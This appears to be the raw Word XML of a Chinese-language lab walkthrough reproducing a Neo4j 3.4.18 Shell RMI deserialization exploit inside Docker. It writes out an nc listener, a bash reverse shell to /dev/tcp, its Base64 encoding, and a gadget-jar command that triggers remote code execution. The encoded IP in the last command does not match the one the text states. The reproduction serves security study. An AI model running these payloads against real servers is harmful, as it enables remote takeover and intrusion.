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23CD9A94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A03589" w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Neo4j</w:t>
      </w:r>
      <w:r w:rsidR="00695AEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A03589" w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.4.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，打开命令行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15217A30" w14:textId="7691A648" w:rsidR="00DA0DBA" w:rsidRDefault="00A03589" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431719C6" w14:textId="71265B50" w:rsidR="00EA3792" w:rsidRDefault="00A03589" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2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>docker-compose ps</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792"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 w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260C930" w14:textId="068A85DD" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00A03589" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Neo4j</w:t>
      </w:r>
      <w:r w:rsidR="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.4.18</w:t>
      </w:r>
      <w:r w:rsidR="0060137D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，开放端口为8123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:t>开启了 Neo4j Shell 端口 1337，该端口使用 RMI 协议通信</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35241458" w14:textId="62F09E0E" w:rsidR="00CD5E58" w:rsidRDefault="00A03589" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、复现结束后使用命令</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> down关闭容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234401B" w14:textId="20AF7755" w:rsidR="00864F1A" w:rsidRPr="00EA3792" w:rsidRDefault="00A03589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30ACEDCF" wp14:editId="2EEA2110">
            <wp:extent cx="5274310" cy="1130935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="259281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1BE21B72" w14:textId="77777777" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 在本机使用 nc 命令监听 8889 端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF948E9" w14:textId="52A863BD" w:rsidR="00A03589" w:rsidRPr="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc -lvp 8889</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EDA47" w14:textId="77777777" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. 构建 payload，将反弹 shell 的攻击机 IP 和端口进行 Base64 编码这里使用 Docker 的回环地址 172.17.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DC98C0" w14:textId="77777777" w:rsidR="00A03589" w:rsidRPr="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> bash -i &gt;&amp; /dev/tcp/172.17.0.1/8889 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851898A" w14:textId="77777777" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589"/>
    <w:p w14:paraId="34AEA5E7" w14:textId="5B162FE6" w:rsidR="00A03589" w:rsidRPr="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzg4ODkgMD4mMQ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F5893" w14:textId="77777777" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3. 进入容器命令行，在 EXP 目录下存在已经编译好的 EXP 文件 rhino_gadget.jar，并执行 EXP 文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F242BAA" w14:textId="77777777" w:rsidR="00A03589" w:rsidRPr="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>docker exec -it neo4j-3.4.18 bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793953CC" w14:textId="77777777" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589"/>
    <w:p w14:paraId="393E934D" w14:textId="7D38704E" w:rsidR="00A03589" w:rsidRPr="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A03589">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> java -jar /EXP/rhino_gadget.jar rmi://127.0.0.1:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xNTMvODg4OSAwPiYx}|{base64,-d}|{bash,-i}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5B502" w14:textId="77777777" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589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798D86A8" w14:textId="477E48A2" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A0358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F075AB9" wp14:editId="245012B3">
            <wp:extent cx="5274310" cy="1311275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="17152972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3C235" w14:textId="77777777" w:rsidR="00A03589" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4. 在监听端口可以看到成功反弹了 shell，成功执行了 ls 和 whoami 命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6D51A" w14:textId="0F60A5A3" w:rsidR="00864F1A" w:rsidRPr="00864F1A" w:rsidRDefault="00A03589" w:rsidP="00A03589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CB4F9C6" wp14:editId="32F60CA6">
            <wp:extent cx="5274310" cy="4087495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="18269565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4F1A" w:rsidRPr="00864F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418B5"/>
    <w:rsid w:val="00087362"/>
    <w:rsid w:val="000D0CC9"/>
    <w:rsid w:val="00137508"/>
    <w:rsid w:val="00183349"/>
    <w:rsid w:val="001F470D"/>
    <w:rsid w:val="00277AB1"/>
    <w:rsid w:val="00352466"/>
    <w:rsid w:val="00353491"/>
    <w:rsid w:val="004950A1"/>
    <w:rsid w:val="004A00AD"/>
    <w:rsid w:val="004D1ED0"/>
    <w:rsid w:val="00553595"/>
    <w:rsid w:val="0060137D"/>
    <w:rsid w:val="00695AEE"/>
    <w:rsid w:val="00696786"/>
    <w:rsid w:val="006B79E3"/>
    <w:rsid w:val="00832EE7"/>
    <w:rsid w:val="00836B6A"/>
    <w:rsid w:val="00861775"/>
    <w:rsid w:val="00864F1A"/>
    <w:rsid w:val="00881BAE"/>
    <w:rsid w:val="009B33E4"/>
    <w:rsid w:val="009D5886"/>
    <w:rsid w:val="00A03589"/>
    <w:rsid w:val="00A44816"/>
    <w:rsid w:val="00BB76DC"/>
    <w:rsid w:val="00BC10EC"/>
    <w:rsid w:val="00BC509C"/>
    <w:rsid w:val="00BC5D71"/>
    <w:rsid w:val="00C37C0A"/>
    <w:rsid w:val="00C43EFA"/>
    <w:rsid w:val="00C66350"/>
    <w:rsid w:val="00CD5E58"/>
    <w:rsid w:val="00CD79E1"/>
    <w:rsid w:val="00CF3B8C"/>
    <w:rsid w:val="00D97105"/>
    <w:rsid w:val="00DA0DBA"/>
    <w:rsid w:val="00DA5642"/>
    <w:rsid w:val="00DB3F6F"/>
    <w:rsid w:val="00DE0246"/>
    <w:rsid w:val="00DF4450"/>
    <w:rsid w:val="00EA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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-12T04:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>